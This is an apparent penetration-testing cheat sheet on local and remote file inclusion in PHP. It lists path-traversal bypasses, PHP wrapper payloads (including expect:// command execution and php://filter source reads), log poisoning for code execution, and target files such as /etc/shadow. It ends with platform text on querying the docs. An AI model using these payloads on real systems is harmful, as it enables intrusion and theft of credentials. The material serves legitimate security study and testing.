> For the complete documentation index, see [llms.txt](https://kashz.gitbook.io/kashz-jewels/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kashz.gitbook.io/kashz-jewels/tricks/php-wrappers-lfi.md). # php wrappers, LFI ## [dotdotpwn](https://github.com/wireghoul/dotdotpwn) Note: preinstalled in latest kali iso. Works for `http, ftp, tftp` ```bash dotdotpwn -h IP -m MODE -f FILE-TO-FUZZ -U USER -P PASS ``` ## Workarounds NOTE: **Read the file that is running LFI** to get more information about the code. * Bypassing filters using `....//` * Using null byte %00: `/etc/passwd%00` * URL encoding techniques (double encoding) ### LFI wordlist * `/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt` ## .php wrappers ```bash # protocol wraper file=http://IP/ file=ftp://IP/ file=//IP/smb-share/file # expect wrapper # allows to run system commands file=expect://id # input wrapper file=php://input # needs to send POST data | # filter wrappers file=php://filter/resource=PHP-FILE file=filter/read=string.rot13/resource=PHP-FILE file=php://filter/convert.base64-encode/resource=PHP-FILE ``` ## LFI to RCE (linux) ```bash # using LFI can read access log files and then log poision # if user does not have perms to read log files; can do file descriptor way LFI=/proc/self/fd/{NUMBER} # once have access to log file > log-poisoning. ``` ## LFI Paths (linux) ```bash /etc/issue /etc/passwd /etc/shadow /etc/group /etc/hosts /etc/motd /etc/mysql/my.cnf /proc/PID_NUMBER/fd/FILE_DESCRIPTOR_NUMBER /proc/self/environ /proc/version /proc/cmdline ``` ## LFI Paths (windows) ```bash C:\Windows\System32\Drivers\etc\hosts C:\\Windows\\System32\\Drivers\\etc\\hosts \Windows\System32\Drivers\etc\hosts \\Windows\\System32\\Drivers\\etc\\hosts C:\Windows\win.ini C:\\Windows\\win.ini \Windows\win.ini \\Windows\\win.ini C:\Windows\system.ini C:\\Windows\\system.ini \Windows\system.ini \\Windows\\system.ini ``` ## LFI PHP Code Analysis ```php ``` The above code block includes any value given to the file paramter. ```php ``` The above code block includes any value given to the file parameter as long as its in the downloads directory. To bypass use `../../../<>` ```php ``` The above code block includes any value given to the file parameter as long as its in the downloads directory and appends `.php` to the user input value. To bypass use `../../../<>` and value ending with `%00`. When there is substitution for `../`, bypass using `....//` as it will convert to `../` ## RFI PHP Code Analysis Requirement for RFI to work is `allow_url_fopen` and `allow_url_include` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://kashz.gitbook.io/kashz-jewels/tricks/php-wrappers-lfi.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.